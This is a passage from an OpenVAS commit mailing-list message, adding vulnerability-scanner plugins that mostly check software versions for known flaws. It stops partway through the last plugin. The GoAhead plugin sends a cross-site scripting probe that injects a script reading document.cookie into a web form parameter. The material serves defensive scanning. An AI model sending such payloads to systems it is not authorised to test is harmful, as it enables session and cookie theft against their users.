[Openvas-commits] r12171 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Nov 23 15:12:52 CET 2011


Author: antu123
Date: 2011-11-23 15:12:45 +0100 (Wed, 23 Nov 2011)
New Revision: 12171

Added:
   trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
   trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
Log:
Added new plugins and updated gb_sendmail_mail_relay_vuln.nasl

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/ChangeLog	2011-11-23 14:12:45 UTC (rev 12171)
@@ -1,3 +1,19 @@
+2011-11-23 Antu Sanadi <santu at secpod.com>
+
+	* scripts/gb_chasen_bof_vuln_win.nasl,
+	scripts/gb_chasen_bof_vuln_lin.nasl,
+	scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl,
+	scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl,
+	scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl,
+	scripts/secpod_clamav_recursion_dos_vuln_win.nasl,
+	scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl,
+	scripts/secpod_phpmyadmin_setup_interface_xss_vuln.nasl,
+	scripts/secpod_goahead_webserver_mult_xss_vuln.nasl:
+	Added new plugins.
+
+	* scripts/gb_sendmail_mail_relay_vuln.nasl:
+	Added CVE-2003-0285 and updated description.
+
 2011-11-23  Jan-Oliver Wagner <jan-oliver.wagner at greenbone.net>
 
 	* scripts/secpod_qemu_detect_lin.nasl: Revised according to CR#57.

Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,103 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_lin.nasl 18445 2011-11-11 11:11:11Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802344);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4000");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-11 14:20:07 +0530 (Fri, 11 Nov 2011)");
+  script_name("ChaSen Buffer Overflow Vulnerability (Lindows)");
+  desc = "
+  Overview: The host is running ChaSen Software and is prone to buffer
+  overflow vulnerability
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when reading user-supplied input string,
+  which allows attackers to execute arbitrary code via a crafted string.
+
+  Impact:
+  Successful exploitation allows remote attackers to cause a buffer overflow
+  or execute arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  ChaSen Version 2.4.x
+
+  Fix: Use ChaSen Version 2.3.3,
+  For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+  References:
+  http://jvn.jp/en/jp/JVN16901583/index.html
+  http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+  script_description(desc);
+  script_summary("Check for the vulnerable ChaSen version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+  exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+  exit(0);
+}
+
+chaName = find_file(file_name:"chasen-config", file_path:"/", useregex:TRUE,
+                         regexpar:"$", sock:sock);
+
+foreach binaryName (chaName)
+{
+  ## Get the ChaSen version from command
+  chaVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+                             ver_pattern:"[0-9.]+", sock:sock);
+
+  ## Check for ChaSen Version 2.4.x
+  if(chaVer[1] != NULL)
+  {
+    if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4"))
+    {
+      security_hole(0);
+      ssh_close_connection();
+      exit(0);
+    }
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,96 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_chasen_bof_vuln_win.nasl 18445 2011-11-10 17:14:14Z nov $
+#
+# ChaSen Buffer Overflow Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(802343);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4000");
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-09 16:19:55 +0530 (Wed, 09 Nov 2011)");
+  script_name("ChaSen Buffer Overflow Vulnerability (Windows)");
+  desc = "
+  Overview: The host is running ChaSen Software and is prone to buffer
+  overflow vulnerability
+
+  Vulnerability Insight:
+  The flaw is caused due to an error when reading user-supplied input string,
+  which allows attackers to execute arbitrary code via a crafted string.
+
+  Impact:
+  Successful exploitation allows remote attackers to cause a buffer overflow
+  or execute arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  ChaSen Version 2.4.x
+
+  Fix: Use ChaSen Version 2.3.3,
+  For Updates Refer, http://chasen.naist.jp/hiki/ChaSen/
+
+  References:
+  http://jvn.jp/en/jp/JVN16901583/index.html
+  http://jvndb.jvn.jp/en/contents/2011/JVNDB-2011-000099.html ";
+
+  script_description(desc);
+  script_summary("Check for the vulnerable ChaSen version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_reg_enum.nasl");
+  script_require_ports(139, 445);
+  exit(0);
+}
+
+include("smb_nt.inc");
+include("version_func.inc");
+include("secpod_smb_func.inc");
+
+## Check for Windows
+if(!get_kb_item("SMB/WindowsVersion")){
+  exit(0);
+}
+
+key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\chasen";
+if(!registry_key_exists(key:key)){
+  exit(0);
+}
+
+## Get ChaSen version from registry
+chaName = registry_get_sz(key:key, item:"DisplayName");
+if("ChaSen" >< chaName)
+{
+  chaVer = eregmatch(pattern:"ChaSen ([0-9.]+)", string:chaName);
+  if(chaVer[1] != NULL)
+  {
+    if(version_in_range(version:chaVer[1], test_version:"2.4.0", test_version2:"2.4.4")){
+      security_hole(0);
+    }
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/gb_chasen_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Modified: trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/gb_sendmail_mail_relay_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -28,8 +28,8 @@
 {
   script_id(802194);
   script_version("$Revision$");
-  script_cve_id("CVE-2002-1278");
-  script_bugtraq_id(6118);
+  script_cve_id("CVE-2002-1278", "CVE-2003-0285");
+  script_bugtraq_id(6118, 7580);
   script_tag(name:"cvss_base", value:"7.5");
   script_tag(name:"risk_factor", value:"High");
   script_tag(name:"last_modification", value:"$Date$");
@@ -56,10 +56,14 @@
   Affected Software/OS:
   Linuxconf versions 1.24 r2, 1.2.5 r3
   Linuxconf versions 1.24 r2, 1.2.5 r3 on Conectiva Linux 6.0 through 8
+  IBM AIX versions 4.3, 4.3.1, 4.3.2, 4.3.3, 5.1, 5.1 L, 5.2
 
   Fix: Upgrade to the latest version of Linuxconf version 1.29r1 or later
   For updates refer, http://www.solucorp.qc.ca/linuxconf/
 
+  For IBM AIX, apply the patch from below link
+  ftp://aix.software.ibm.com/aix/efixes/security/sendmail_3_mod.tar.Z
+
   References:
   http://osvdb.org/6066
   http://xforce.iss.net/xforce/xfdb/10554

Added: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,83 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_clamav_recursion_dos_vuln_win.nasl 18582 2011-11-22 17:51:52Z nov $
+#
+# ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902760);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3627");
+  script_bugtraq_id(50183);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-22 17:51:52 +0530 (Tue, 22 Nov 2011)");
+  script_name("ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with ClamAV and is prone to denial of service
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the way the bytecode engine handled recursion
+  level when scanning an unpacked file.
+
+  Impact:
+  Successful exploitation will let the attackers to cause a denial of service
+  (crash) via vectors related to recursion level.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  ClamAV before 0.97.3 on Windows.
+
+  Fix: Upgrade to ClamAV version 0.97.3 or later
+  For updates refer, http://www.clamav.net/lang/en/download/
+
+  References:
+  http://www.ubuntu.com/usn/USN-1258-1/
+  https://bugzilla.redhat.com/show_bug.cgi?id=746984
+  http://git.clamav.net/gitweb?p=clamav-devel.git;a=commitdiff;h=3d664817f6ef833a17414a4ecea42004c35cc42f ";
+
+  script_description(desc);
+  script_summary("Check for the Version of ClamAV");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Denial of Service");
+  script_dependencies("gb_clamav_detect_win.nasl");
+  script_require_keys("ClamAV/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+avVer = get_kb_item("ClamAV/Win/Ver");
+if(avVer == NULL){
+  exit(0);
+}
+
+if(version_is_less(version:avVer, test_version:"0.97.3")){
+  security_warning(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_clamav_recursion_dos_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,100 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_goahead_webserver_mult_xss_vuln.nasl 18585 2011-11-23 12:12:12Z nov $
+#
+# GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902589);
+  script_version("$Revision$");
+  script_bugtraq_id(50729);
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-23 12:12:12 +0530 (Wed, 23 Nov 2011)");
+  script_name("GoAhead WebServer 'name' and 'address' Cross-Site Scripting Vulnerabilities");
+  desc = "
+  Overview: This host is running GoAhead Webserver and is prone to multiple
+  cross site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are caused due to improper validation of user-supplied input
+  via the 'name' and 'address' parameters in goform/formTest, which allows
+  attackers to execute arbitrary HTML and script code in a user's browser
+  session in the context of an affected site.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  GoAhead Webserver version 2.5
+
+  Fix: No solution or patch is available as on 23rd November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+  References:
+  http://osvdb.org/77198
+  http://secunia.com/advisories/46896
+  http://webserver.goahead.com/forum/topic/169 ";
+
+  script_description(desc);
+  script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web Servers");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+  exit(0);
+}
+
+## Construct Attack Request
+url = "/goform/formTest?name=<script>alert(document.cookie)</script>";
+
+## Try XSS attack and check the response to confirm vulnerability
+if(http_vuln_check(port:port, url:url, check_header: TRUE,
+                   pattern:"Name: <script>alert\(document.cookie\)</script>")){
+  security_warning(port);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_goahead_webserver_mult_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl 18583 2011-11-21 17:43:12 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902636);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3900");
+  script_bugtraq_id(50701);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-11 11:11:11 +0530 (Mon, 14 Nov 2011)");
+  script_name("Google Chrome V8 Remote Code Execution Vulnerability (Linux)");
+  desc = "
+  Overview: The host is installed with Google Chrome and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an out-of-bounds write operation error in V8
+  (JavaScript engine) causing memory corruption.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code,
+  cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 15.0.874.121 on Linux
+
+  Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://osvdb.org/show/osvdb/77193
+  http://secunia.com/advisories/46889/
+  http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+  script_description(desc);
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_lin.nasl");
+  script_require_keys("Google-Chrome/Linux/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("Google-Chrome/Linux/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl 18583 2011-11-21 17:55:43 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902637);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3900");
+  script_bugtraq_id(50701);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-21 17:55:43 +0530 (Mon, 21 Nov 2011)");
+  script_name("Google Chrome V8 Remote Code Execution Vulnerability (Mac OS X)");
+  desc = "
+  Overview: The host is installed with Google Chrome and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an out-of-bounds write operation error in V8
+  (JavaScript engine) causing memory corruption.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code,
+  cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 15.0.874.121 on Mac OS X
+
+  Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://osvdb.org/show/osvdb/77193
+  http://secunia.com/advisories/46889/
+  http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+  script_description(desc);
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_macosx.nasl");
+  script_require_keys("GoogleChrome/MacOSX/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/MacOSX/Version");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Version less than 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl 18583 2011-11-21 17:12:14 nov $
+#
+# Google Chrome V8 Remote Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902635);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3900");
+  script_bugtraq_id(50701);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-21 17:153:15 +0530 (Mon, 21 Nov 2011)");
+  script_name("Google Chrome V8 Remote Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: The host is installed with Google Chrome and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an out-of-bounds write operation error in V8
+  (JavaScript engine) causing memory corruption.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code,
+  cause a denial of service.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Google Chrome version prior to 15.0.874.121 on Windows
+
+  Fix: Upgrade to the Google Chrome 15.0.874.121 or later,
+  For updates refer, http://www.google.com/chrome
+
+  References:
+  http://osvdb.org/show/osvdb/77193
+  http://secunia.com/advisories/46889/
+  http://googlechromereleases.blogspot.com/2011/11/stable-channel-update_16.html ";
+
+  script_description(desc);
+  script_summary("Check the version of Google Chrome");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_google_chrome_detect_win.nasl");
+  script_require_keys("GoogleChrome/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+chromeVer = get_kb_item("GoogleChrome/Win/Ver");
+if(!chromeVer){
+  exit(0);
+}
+
+## Check for Google Chrome Versions prior to 15.0.874.121
+if(version_is_less(version:chromeVer, test_version:"15.0.874.121")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_google_chrome_v8_remote_code_exec_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date

Added: trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl	2011-11-23 13:04:58 UTC (rev 12170)
+++ trunk/openvas-plugins/scripts/secpod_ms_windows_ip_validation_code_exec_vuln.nasl	2011-11-23 14:12:45 UTC (rev 12171)
@@ -0,0 +1,136 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: secpod_ms_windows_ip_validation_code_exec_vuln.nasl 18523 2011-11-21 15:15:15Z nov $
+#
+# Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902588);
+  script_version("$Revision$");
+  script_cve_id("CVE-2005-0048");
+  script_bugtraq_id(13116);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-21 15:15:15 +0530 (Mon, 21 Nov 2011)");
+  script_name("Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability");
+  desc = "
+  Overview: The host is running Microsoft Windows and is prone to remote code
+  execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to insufficient validation of IP options and can be
+  exploited to cause a vulnerable system to stop responding and restart or may
+  allow execution of arbitrary code by sending a specially crafted IP packet
+  to a vulnerable system.
+
+  Impact:
+  Successful exploitation will let the attacker to cause a denial of service
+  and possibly execute arbitrary code via crafted IP packets with malformed
+  options.
+
+  Impact Level: System
+
+  Affected Software/OS:
+  Microsoft Windows XP SP2 and prior.
